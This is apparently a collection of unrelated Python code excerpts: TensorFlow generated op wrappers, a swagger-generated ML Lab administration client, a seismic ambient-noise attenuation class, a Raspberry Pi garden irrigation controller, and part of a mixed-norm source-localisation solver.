_execute.record_gradient(
"TensorMapLookup", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapLookup = tf_export("raw_ops.TensorMapLookup")(_ops.to_raw_op(tensor_map_lookup))
def tensor_map_lookup_eager_fallback(input_handle, key, value_dtype, name, ctx):
value_dtype = _execute.make_type(value_dtype, "value_dtype")
_attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle, key]
_attrs = ("key_dtype", _attr_key_dtype, "value_dtype", value_dtype)
_result = _execute.execute(b"TensorMapLookup", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapLookup", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_size')
def tensor_map_size(input_handle, name=None):
r"""Returns the number of tensors in the input tensor map.
input_handle: the input map
size: the number of tensors in the map
Args:
input_handle: A `Tensor` of type `variant`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `int32`.
"""
_ctx = _context._context | |
# coding: utf-8
"""
ML Lab Service
Functionality to create and manage Lab projects, services, datasets, models, and experiments. # noqa: E501
OpenAPI spec version: 3.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from lab_api.swagger_client.api_client import ApiClient
class AdministrationApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def check_workspace(self, **kwargs): # noqa: E501
"""Checks whether a workspace container for the passed id already exists. If not, a new one is created & started. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.check_workspace(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id:
:param str authorization: Authorization Token
:return: StatusMessageFormat
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.check_workspace_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.check_workspace_with_http_info(**kwargs) # noqa: E501
return data
def check_workspace_with_http_info(self, **kwargs): # noqa: E501
"""Checks whether a workspace container for the passed id already exists. If not, a new one is created & started. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.check_workspace_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id:
:param str authorization: Authorization Token
:return: StatusMessageFormat
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'authorization'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method check_workspace" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'id' in params:
query_params.append(('id', params['id'])) # noqa: E501
header_params = {}
if 'authorization' in params:
header_params['authorization'] = params['authorization'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/admin/workspace/check', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StatusMessageFormat', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_events(self, **kwargs): # noqa: E501
"""Returns events filtered by a specified event type (admin-only). # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_events(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str event: Event Type. If not provided, all events will be returned.
:param str authorization: Authorization Token
:return: ListOfLabEventsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_events_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_events_with_http_info(**kwargs) # noqa: E501
return data
def get_events_with_http_info(self, **kwargs): # noqa: E501
"""Returns events filtered by a specified event type (admin-only). # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_events_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str event: Event Type. If not provided, all events will be returned.
:param str authorization: Authorization Token
:return: ListOfLabEventsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['event', 'authorization'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_events" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'event' in params:
query_params.append(('event', params['event'])) # noqa: E501
header_params = {}
if 'authorization' in params:
header_params['authorization'] = params['authorization'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/admin/events', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListOfLabEventsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_lab_info(self, **kwargs): # noqa: E501
"""Returns information about this Lab instance. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_lab_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authorization Token
:return: LabInfoResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_lab_info_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_lab_info_with_http_info(**kwargs) # noqa: E501
return data
def get_lab_info_with_http_info(self, **kwargs): # noqa: E501
"""Returns information about this Lab instance. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_lab_info_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authorization Token
:return: LabInfoResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['authorization'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_lab_info" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'authorization' in params:
header_params['authorization'] = params['authorization'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/admin/info', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LabInfoResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_statistics(self, **kwargs): # noqa: E501
"""Returns statistics about this Lab instance (admin-only). # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_statistics(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authorization Token
:return: LabStatisticsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_statistics_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_statistics_with_http_info(**kwargs) # noqa: E501
return data
def get_statistics_with_http_info(self, **kwargs): # noqa: E501
"""Returns statistics about this Lab instance (admin-only). # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_statistics_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authorization Token
:return: LabStatisticsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['authorization'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_statistics" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'authorization' in params:
header_params['authorization'] = params['authorization'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/admin/statistics', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LabStatisticsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def reset_all_workspaces(self, **kwargs): # noqa: E501
"""Resets all workspaces. Use with caution (admin-only). # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.reset_all_workspaces(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authorization Token
:return: | |
Attenuation From Seismic Ambient Noise:
Numerical Validation and Application, JGR
"""
def __init__(self, src, savedir=None, verbose=True):
"""
Parameters
----------
src : str
Absolute path to the directory containing the files associated with
the continuous seismograms
savedir : str
Absolute path to the directory where the results are saved
verbose : bool
Whether or not information on progress is printed in the console
"""
self.verbose = verbose
self.src = src
savedir = os.path.dirname(src) if savedir is None else savedir
self.savedir = os.path.join(savedir, 'an_attenuation')
os.makedirs(self.savedir, exist_ok=True)
self.files = self.get_files()
def __str__(self):
string = '\nRAYLEIGH-WAVE ATTENUATION FROM SEISMIC AMBIENT NOISE'
separators = len(string)
string += '\n%s'%('='*separators)
stations = set(['.'.join(i.split('.')[:2]) for i in self.files])
string += '\nRECEIVERS: %s'%(len(stations))
string += '\n%s'%('='*separators)
string += '\nSOURCE DIR: %s'%self.src
string += '\nSAVE DIR: %s'%self.savedir
return string
def __repr__(self):
return str(self)
def get_files(self):
"""
Retrieves the files to be processed for extracting Rayleigh-wave
attenuation on the vertical component.
Returns
-------
files : list of str
e.g. ['net1.sta1.00.BHZ.sac', 'net1.sta2.00.BHZ.sac']
"""
files = []
for file in sorted(os.listdir(self.src)):
channel = file.split('.')[-2]
if 'HZ' in channel:
files.append(file)
return files
def get_stations_coords(self, files):
"""
Retrieves the geographic coordinates associated with each receiver
Parameters
----------
files: list of str
Names of the files corresponding with the continuous seismograms,
located in the `src` directory
Returns
-------
coords : dict
each key corresponds to a station code ($network_code.$station_code)
and each value is a tuple containing latitude and longitude of the
station. For example:
{ net1.sta1 : (lat1, lon1),
net1.sta2 : (lat2, lon2),
net2.sta3 : (lat3, lon3)
}
"""
coords = {}
for file in files:
station_code = '.'.join(file.split('.')[:2])
tr = read(os.path.join(self.src, file))[0]
lat, lon = tr.stats.sac.stla, tr.stats.sac.stlo
coords[station_code] = (lat, lon)
if self.verbose:
print(station_code, '%.3f'%lat, '%.3f'%lon)
return coords
def prepare_data(self, recompute=False):
"""
Saves to disk the geographic coordinates associated with each receiver.
These are saved to $self.savedir/stations.pickle
The stations.pickle file contains a dictionary object where each key
corresponds to a station code ($network_code.$station_code) and each
value is a tuple containing latitude and longitude of the station.
For example:
{ net1.sta1 : (lat1, lon1),
net1.sta2 : (lat2, lon2),
net2.sta3 : (lat3, lon3)
}
Parameters
----------
recompute : bool
If True, the station coordinates and times will be removed from
disk and recalculated. Otherwise (default), if they are present,
they will be loaded into memory, avoiding any computation. This
parameter should be set to True whenever one has added files to
the source directory
"""
savefile = os.path.join(self.savedir, 'stations.pickle')
if recompute:
remove_file(savefile)
if not os.path.exists(savefile):
coords = self.get_stations_coords(self.files)
save_pickle(savefile, coords)
else:
coords = load_pickle(savefile)
self.stations = coords
def parameterize(self, cell_size, overlap=0.5, min_no_stations=6,
plotting=True, plot_resolution='110m'):
"""
Creates the equal area (possibly overlapping) parameterization used in
the subsequent analysis. The equal-area grid is created through the
EqualAreaGrid class of seislib.
The parameterization is saved at $self.savedir/parameterization.pickle
Parameters
----------
cell_size : float, int (in degrees)
Size of each grid cell of the resulting parameterization
overlap : float
If > 0, the parameterization will be overlapping in space by the
specified extent [e.g., Magrini et al. 2021]. Default is 0.5
min_no_stations : int
Minimum number of stations falling within each grid-cell. If the
value is not reached, the grid-cell in question is removed from the
parameterization
plotting : bool
If True, a figure on the resulting parameterization is displayed
plot_resolution : str
Resolution of the Earth features displayed in the figure. Passed to
cartopy.feature.NaturalEarthFeature. Valid arguments are '110m',
'50m', '10m'. Default is '110m'
References
----------
Magrini et al. 2021, Rayleigh‑wave attenuation across the conterminous
United States in the microseism frequency band, Scientific Reports
"""
def add_overlap(grid, overlap_east=0.5, overlap_north=0.5):
mesh = grid.mesh
dlat = (1-overlap_north) * (mesh[:,1]-mesh[:,0])
old_mesh = mesh.copy()
for i in range(1, round(1 / (1-overlap_north))):
new_lats = old_mesh[:, :2] + dlat.reshape(-1, 1)*i
mesh = np.row_stack((
mesh, np.column_stack((new_lats, old_mesh[:, 2:]))
))
dlon = (1-overlap_east) * (mesh[:,3]-mesh[:,2])
old_mesh = mesh.copy()
for i in range(1, round(1 / (1-overlap_east))):
new_lons = old_mesh[:, 2:] + dlon.reshape(-1, 1)*i
mesh = np.row_stack((
mesh, np.column_stack((old_mesh[:, :2], new_lons))
))
return sort_mesh(mesh)
def sort_mesh(mesh):
mesh = mesh[np.argsort(mesh[:,0])][::-1]
final_indexes = []
indexes = [0]
lb, ub = mesh[0, :2]
for i, (lat1, lat2, lon1, lon2) in enumerate(mesh[1:], 1):
if lat1==lb and lat2==ub:
indexes.append(i)
else:
final_indexes.extend(list(
np.array(indexes)[np.argsort(mesh[indexes, 2])]
))
indexes = [i]
lb, ub = lat1, lat2
if indexes:
final_indexes.extend(list(
np.array(indexes)[np.argsort(mesh[indexes, 2])]
))
return mesh[final_indexes]
def stations_per_pixel(grid, station_codes, station_coords):
sta_per_pixel = []
sta_in_pixel = []
for lat1, lat2, lon1, lon2 in grid.mesh:
idx_stations_in_pixel = np.flatnonzero(
(station_coords[:,0]>=lat1) \
& (station_coords[:,0]<=lat2) \
& (station_coords[:,1]>=lon1) \
& (station_coords[:,1]<=lon2))
n_stations = idx_stations_in_pixel.size
sta_per_pixel.append(n_stations)
sta_in_pixel.append(list(station_codes[idx_stations_in_pixel]))
return np.array(sta_per_pixel), sta_in_pixel
def plot_stations_and_grid(station_coords, grid, map_boundaries):
def plot_one_pixel(coords, ax):
lat1, lat2, lon1, lon2 = coords
paths = [
((lon1, lon1), (lat1, lat2)),
((lon1, lon2), (lat2, lat2)),
((lon2, lon2), (lat2, lat1)),
((lon2, lon1), (lat1, lat1)),
]
for x, y in paths:
ax.plot(x, y, 'r', transform=transform)
transform = ccrs.PlateCarree()
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1, projection=ccrs.Mercator())
ax.set_extent(map_boundaries, ccrs.PlateCarree())
add_earth_features(ax,
scale=plot_resolution,
oceans_color='water',
lands_color='land')
ax = grid.plot(ax=ax, show=False)
ax.plot(*station_coords.T[::-1], '^b', transform=transform)
plot_one_pixel(grid.mesh[0], ax)
plt.show()
def plot_stations_per_pixel(sta_per_pixel):
plt.figure()
plt.hist(sta_per_pixel, bins=10, ec='w')
plt.xlabel('Stations per sub-array', labelpad=10)
plt.show()
def get_map_boundaries(grid):
dlon = (grid.lonmax - grid.lonmin) * 0.05
dlat = (grid.latmax - grid.latmin) * 0.05
lonmin = grid.lonmin-dlon if grid.lonmin-dlon > -180 else grid.lonmin
lonmax = grid.lonmax+dlon if grid.lonmax+dlon < 180 else grid.lonmax
latmin = grid.latmin-dlat if grid.latmin-dlat > -90 else grid.latmin
latmax = grid.latmax+dlat if grid.latmax+dlat < 90 else grid.latmax
return (lonmin, lonmax, latmin, latmax)
station_codes, station_coords = zip(*list(self.stations.items()))
station_codes = np.array(station_codes)
station_coords = np.array(station_coords)
latmin, latmax = station_coords[:,0].min(), station_coords[:,0].max()
lonmin, lonmax = station_coords[:,1].min(), station_coords[:,1].max()
grid = EqualAreaGrid(cell_size,
latmin=latmin,
latmax=latmax,
lonmin=lonmin,
lonmax=lonmax,
)
if overlap > 0:
mesh = add_overlap(grid, overlap_east=overlap, overlap_north=overlap)
grid.update_grid_params(mesh)
no_stations = stations_per_pixel(grid, station_codes, station_coords)[0]
grid.select_cells(np.flatnonzero(no_stations >= min_no_stations))
no_stations, codes = stations_per_pixel(grid,
station_codes,
station_coords)
data = {
'grid': grid.mesh,
'no_stations': no_stations,
'station_codes': [sorted(c) for c in codes]
}
save_pickle(os.path.join(self.savedir, 'parameterization.pickle'),
data)
if plotting:
map_boundaries = get_map_boundaries(grid)
plot_stations_and_grid(station_coords, grid, map_boundaries)
plot_stations_per_pixel(no_stations)
def compute_ffts(self, fs=1, window_length=3600):
""" Computes the Fourier transforms for all the continuous data.
A directory $self.savedir/fft will be created, and all Fourier
transforms will be saved within it. Within the same directory, two other
files will be created: (i) the frequency vector associated with each
Fourier transform, named frequencies.npy, and (ii) a dictionary object
where the starting and ending times of all continuous seismograms
are stored, named times.pickle
Parameters
----------
fs : int, float
Target sampling rate of the continuous seismograms. If some
seismogram is characterized by a different sampling rate, it will
be resampled
window_lenght : int, float (s)
Length of the time windows used to perform the cross correlations
Warning
-------
The operation might take a relatively large space on disk, depending on
the amount of continuous seismograms available and on the sampling rate
chosen. (Even more than the size of the original data.) This necessary
to speed up (consistently) the operations needed to extract attenuation
measurements, mostly in the calculation of the average power spectral
density of each sub-array found in each grid cell of the parameterization.
"""
def fourier_transform(x, window_samples):
taper = cosine_taper(window_samples, p=0.05)
x = detrend(x, type='constant')
x *= taper
return rfft(x, window_samples)
def start_end_indexes(tr, times):
starttime = tr.stats.starttime.timestamp
endtime = tr.stats.endtime.timestamp
start_idx = np.argmin( np.abs(np.array(times) - starttime) )
end_idx = np.argmin( np.abs(np.array(times) - endtime) )
return start_idx, end_idx
def round_time(t, window_length, kind='starttime'):
dt = window_length if kind=='starttime' else 0
tstamp = t.timestamp
| |
#!/usr/bin/env python
#
# Irrigation system
# Release 2020-07-05 First version
# Release 2021-02-09 Added queries
# Release 2021-02-22 Added meteolib and caluclation of Evaporation via Makkink formula
# Release 2021-02-24 Changed days to 28, as too early suggesting to add water
# Release 2021-03-01 Added irrigation table with historical amount of water sprinkled
# Release 2021-03-02 Added Watering: define zone, set RPi on/off
# Release 2021-03-08 Changed from daily figures to per 5m (raw data). Changed to 35 days
# Release 2021-03-14 Updated what it prints without logging
# Release 2021-04-08 Fixed stability for NULL entries in database (happens if temporarily disconnected from weather station)
# Release 2021-04-11 Updated driving the sprinkler system with new motorized ball valves instead of solenoid valves
# Added front garden watering, optimized per minute flow measurement
# Release 2021-04-17 Updated for actual working on Raspberry Pi (relay PINs, Keyboard interrupts)
# Release 2021-04-21 Forked for fixed watering during X minuten
# Release 2021-04-22 Adding more structures with classes and files
# Release 2021-04-29 Changed Zone no_barrel to required water pressure (minimal flow)
# Release 2021-05-13 Flipped flowmeter pins 11 and 16
# Release 2021-05-14 Debugging connection issues with fetching row by row
# Release 2021-05-25 Fixing RPi import error to run correctly (emulating) on development host
# Release 2021-06-04 Fixed some logging, added shadow factor (how much a zone is exposed to the sun)
# Release 2021-06-07 Added SigTerm to gracefully exit the process
# Release 2021-06-12 Renamed to 'irrigate', changed relay for grass to 4, and pin sprinkler to 15
# Release 2021-08-07 Added file logging also going to systemd log (journal), added better messages when no water sources
# Release 2021-09-12 Replaced relay board, re-distributed PINs
# Release 2021-09-18 Added MAX_IRRIGATION to limit daily amount of water
#
# TODO
# - Issue with flow vs pressure: Sprinklers generate flow of only ~2, but pressure is good...
# - Fix multiple zone logging on command line (split the command line and find splitted in list)
# - Add expected flow rate to put max timer?
# - Somehow detect if flow meters are working...
# - Test MySQL connection parameters (e.g. if none provided, if -a provided and only writing)
# - Add Evaporation calculation-only mode (to run the script to predict/inform about the upcoming the irrigation)
# - Recover nicely if cannot connect to database (network down)
#
# Author <NAME>
#
# Although there is an explicit copyright on this sourcecode, anyone may use it freely under a
# "Creative Commons Naamsvermelding-NietCommercieel-GeenAfgeleideWerken 3.0 Nederland" licentie.
# Please check http://creativecommons.org/licenses/by-nc-nd/3.0/nl/ for details
#
# This software is provided as is and comes with absolutely no warranty.
# The author is not responsible or liable (direct or indirect) to anyone for the use or misuse of this software.
# Any person using this software does so entirely at his/her own risk.
# That person bears sole responsibility and liability for any claims or actions, legal or civil, arising from such use.
# If you believe this software is in breach of anyone's copyright you will inform the author immediately so the offending material
# can be removed upon receipt of proof of copyright for that material.
#
progname='irrigate.py'
version = "2021-09-18"
import sys
import signal
import logging
from systemd import journal
import argparse
import time
from time import sleep
from datetime import datetime
import mysql.connector
import numpy
import math
import socket
import threading
# Trying to import Raspberry Pi
try:
import RPi.GPIO as GPIO
except ImportError:
# Just continue if does not work; later checking if running on RPi
pass
import makkink_evaporation
# See also (Dutch) https://www.knmi.nl/kennis-en-datacentrum/achtergrond/verdamping-in-nederland
# And from page 22 of https://edepot.wur.nl/136999 it seems Makkink is indicating too much for grass by 0.88-0.92
# Typically the evaporation seems to be too high, so correcting with a factor
EVAP_FACTOR = 1.0
# How many days of evaporation to look back; should be aligned with how often to irrigate???
EVAP_RANGE = 14
# How much water maximally to irrigate per square meter
MAX_IRRIGATION = 10
# Water Source and Zone names
source_barrel_name = "Barrel"
source_drinking_name = "Drinking"
zone_grass_name = "Grass (sweat)"
zone_grass_area = 10 * 8
zone_grass_shadow = 0.9 # Almost all day in the sun
zone_grass_min_flow = 0.5 # sweating / soaker hose does not need a lot of pressure / flow
zone_front_name = "Front (drip)"
zone_front_area = 12 * 4 + 8 * 4
zone_front_shadow = 0.7 # Almost all day in the sun, but well vegetated
zone_front_min_flow = 0.5 # dripping hose does not need a lot of pressure / flow
zone_side_name = "Side (sprinkler)"
zone_side_area = 10 * 4
zone_side_shadow = 0.7 # Morning shadows
zone_side_min_flow = 5.0 # sprinklers need quite some of pressure / flow
# Settings for Relay board 2 (water source ball valves)
valve_drinking_PIN = 31
valve_barrel_PIN = 32
# Settings for Relay board 4 (solenoids for up to 4 irrigation areas)
valve_grass_PIN = 35
valve_front_PIN = 36
valve_sprinkler_PIN = 37
#valve_SPARE_PIN = 38
# Settings for Flow meter GPIO pins
flow_grass_PIN = 7 # Yellow wire
flow_front_PIN = 11 # Green wire
flow_sprinkler_PIN = 15 # Purple wire
def parse_arguments(logger):
################################################################################################################################################
#Commandline arguments parsing
################################################################################################################################################
parser = argparse.ArgumentParser(prog=progname, description='Automatic Irrigation script', epilog="Copyright (c) <NAME>")
parser.add_argument("-l", "--log", help="Logging level, can be 'none', 'info', 'warning', 'debug', default='none'", default='none')
parser.add_argument("-f", "--logfile", help="Logging output, can be 'stdout', or filename with path, default='stdout'", default='stdout')
parser.add_argument("-d", "--days", help="How many days to look back, default %d (exclusive with amount)" % EVAP_RANGE, default=EVAP_RANGE)
parser.add_argument("-a", "--amount", help="How many liters per m2 to irrigate (exclusive with days)", default = '0')
parser.add_argument("-z", "--zones", help="Zone(s) to irrigate, can be 'grass', 'sprinkler', 'front' or multiple. Default is all", default='all', nargs='*')
parser.add_argument("-i", "--info", help="Do not actually irrigate, just show what it would have done", default=False, action="store_true")
parser.add_argument("-e", "--emulate", help="Do not actually open/close valves or store data", default=False, action="store_true")
parser.add_argument("-s", "--server", help="MySQL server or socket path, default='localhost'", default='localhost')
parser.add_argument("-u", "--user", help="MySQL user, default='root'", default='root')
parser.add_argument("-p", "--password", help="MySQL user password, default='password'", default='password')
args = parser.parse_args()
# Handle debugging messages
if (args.logfile == 'stdout'):
if (args.log == 'info'):
# info logging to systemd which already lists timestamp
logging.basicConfig(format='%(asctime)s - %(name)s - %(message)s')
else:
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(lineno)d - %(message)s')
else:
logging.basicConfig(filename=args.logfile,format='%(asctime)s - %(levelname)s - %(lineno)d - %(message)s')
# Also log to systemd
# logger.addHandler(journal.JournalHandler())
# Setting loop duration; default 60s
loop_seconds = 60
if (args.log == 'debug'):
logger.setLevel(logging.DEBUG)
loop_seconds = 10
if (args.log == 'warning'):
logger.setLevel(logging.WARNING)
if (args.log == 'info'):
logger.setLevel(logging.INFO)
loop_seconds = 30
if (args.log == 'error'):
logger.setLevel(logging.ERROR)
if (float(args.amount) != 0):
# If amount is specified, ignore days
days = 0
amount = float(args.amount)
else:
days = int(args.days)
amount = 0
if args.emulate:
emulating = True
else:
emulating = False
if args.info:
info = True
emulating = True
else:
info = False
zones = args.zones
mysql_host=args.server
mysql_user=args.user
mysql_passwd=<PASSWORD>
# return parsed values
return (loop_seconds, days, amount, zones, info, emulating, mysql_host, mysql_user, mysql_passwd)
def handle_sigterm(sig, frame):
print("SigTerm received, raising SystemExit")
raise(SystemExit)
def load_evaporation( logger, \
days, \
mysql_host, \
mysql_user, \
mysql_passwd ):
logger.info("Opening MySQL Database weewx on %s", mysql_host)
db = mysql.connector.connect(user=mysql_user, password=<PASSWORD>, host=mysql_host, database='weewx')
cursor = db.cursor()
# Get the per 5m data from the past X days
# mysql> select dateTime, FROM_UNIXTIME(dateTime), outHumidity, outTemp, pressure, radiation, rain from archive where dateTime >= UNIX_TIMESTAMP(NOW() - INTERVAL 2 DAY) LIMIT 10;
# +------------+-------------------------+-------------+-------------+----------+---------------------+------+
# | dateTime | FROM_UNIXTIME(dateTime) | outHumidity | outTemp | pressure | radiation | rain |
# +------------+-------------------------+-------------+-------------+----------+---------------------+------+
# | 1614630600 | 2021-03-01 21:30:00 | 82 | 4.7 | 1028.1 | 0 | 0 |
# | 1614630900 | 2021-03-01 21:35:00 | 82 | 4.6381 | 1028.08 | 0 | 0 |
# | 1614631200 | 2021-03-01 21:40:00 | 82 | 4.53333 | 1028.12 | 0 | 0 |
# ...
# | 1614839700 | 2021-03-04 07:35:00 | 88 | 5.1 | 1018.3 | 0 | 0.3 |
# | 1614840000 | 2021-03-04 07:40:00 | 88 | 5.1 | 1018.26 | 0 | 0 |
# | 1614840300 | 2021-03-04 07:45:00 | 88 | 5.1 | 1018.12 | 0.0744857142857143 | 0.3 |
# | 1614840600 | 2021-03-04 07:50:00 | 88 | 5.1 | 1018.27 | 0.0744857142857143 | 0 |
# ...
# | 1615209000 | 2021-03-08 14:10:00 | 44.619 | 11.0143 | 1019.96 | 631.790574761905 | 0 |
# | 1615209300 | 2021-03-08 | |
positive integer.'
' Got dgap_freq = %s' % dgap_freq)
pca = True
if not isinstance(evoked, list):
evoked = [evoked]
_check_reference(evoked[0])
all_ch_names = evoked[0].ch_names
if not all(all_ch_names == evoked[i].ch_names
for i in range(1, len(evoked))):
raise Exception('All the datasets must have the same good channels.')
forward, gain, gain_info, whitener, source_weighting, mask = _prepare_gain(
forward, evoked[0].info, noise_cov, pca, depth, loose, rank,
weights, weights_min)
sel = [all_ch_names.index(name) for name in gain_info['ch_names']]
M = np.concatenate([e.data[sel] for e in evoked], axis=1)
# Whiten data
logger.info('Whitening data matrix.')
M = np.dot(whitener, M)
if time_pca:
U, s, Vh = linalg.svd(M, full_matrices=False)
if not isinstance(time_pca, bool) and isinstance(time_pca, int):
U = U[:, :time_pca]
s = s[:time_pca]
Vh = Vh[:time_pca]
M = U * s
# Scaling to make setting of alpha easy
n_dip_per_pos = 1 if is_fixed_orient(forward) else 3
alpha_max = norm_l2inf(np.dot(gain.T, M), n_dip_per_pos, copy=False)
alpha_max *= 0.01
gain /= alpha_max
source_weighting /= alpha_max
if n_mxne_iter == 1:
X, active_set, E = mixed_norm_solver(
M, gain, alpha, maxit=maxit, tol=tol,
active_set_size=active_set_size, n_orient=n_dip_per_pos,
debias=debias, solver=solver, dgap_freq=dgap_freq, verbose=verbose)
else:
X, active_set, E = iterative_mixed_norm_solver(
M, gain, alpha, n_mxne_iter, maxit=maxit, tol=tol,
n_orient=n_dip_per_pos, active_set_size=active_set_size,
debias=debias, solver=solver, dgap_freq=dgap_freq, verbose=verbose)
if time_pca:
X = np.dot(X, Vh)
M = np.dot(M, Vh)
# Compute estimated whitened sensor data
M_estimated = np.dot(gain[:, active_set], X)
if mask is not None:
active_set_tmp = np.zeros(len(mask), dtype=np.bool)
active_set_tmp[mask] = active_set
active_set = active_set_tmp
del active_set_tmp
if active_set.sum() == 0:
raise Exception("No active dipoles found. alpha is too big.")
# Reapply weights to have correct unit
